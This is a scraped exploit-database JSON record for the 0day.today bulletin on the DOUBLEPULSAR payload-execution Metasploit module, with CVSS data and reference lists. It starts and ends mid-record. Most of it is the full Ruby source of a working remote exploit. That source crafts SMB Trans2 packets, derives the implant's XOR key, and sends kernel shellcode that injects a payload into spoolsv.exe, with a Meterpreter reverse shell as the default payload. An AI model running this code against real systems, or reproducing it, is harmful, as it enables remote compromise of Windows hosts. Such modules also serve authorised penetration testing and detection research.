\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-05] #"}, "lastseen": "2021-09-04T22:15:17", "differentElements": ["sourceData"], "edition": 7}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3ace9e5c190b891c9c0bdd28badf178d", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-05T22:11:21", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "rapid7community", 
"idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27803", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-05T22:11:21", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-05T22:11:21", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 
true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-06] #"}, "lastseen": "2021-09-05T22:11:21", "differentElements": ["sourceData"], "edition": 8}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "8ed87ee3e71e41e2d1dc834e9b156160", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-07T06:18:11", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603", 